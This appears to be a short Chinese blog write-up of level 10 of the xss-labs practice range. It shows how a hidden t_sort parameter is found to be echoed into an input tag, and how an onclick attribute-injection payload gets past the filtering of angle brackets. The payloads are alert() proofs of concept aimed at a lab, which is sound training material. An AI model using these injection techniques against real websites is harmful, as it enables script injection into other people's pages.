Level-10:选择标签
(0)


除了 URL 地址栏没有可输入的地方直接查看网页源代码,可以发现有三个隐藏的属性:

看看哪一个属性是会被直接打印出来的,
http://www.kali.com/xss-labs/level10.php?keyword=welldone!&t_link=111&t_history=111&t_sort=111
可以看到唯有 t_sort 被打印出来了:

那就得在该属性下构造 payload 了:

尝试一:
http://www.kali.com/xss-labs/level10.php?keyword=welldone!&t_sort="> <script>alert(/xss/)</script>//
可以看到 <> 被过滤了

尝试二:
http://www.kali.com/xss-labs/level10.php?keyword=welldone!&t_sort=" onclick=alert(/xss/) type=text//
跳出方框,点击,成功

从源码中可以看到确实是只输出了 t_sort <input> 标签

本文为作者HD_More发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论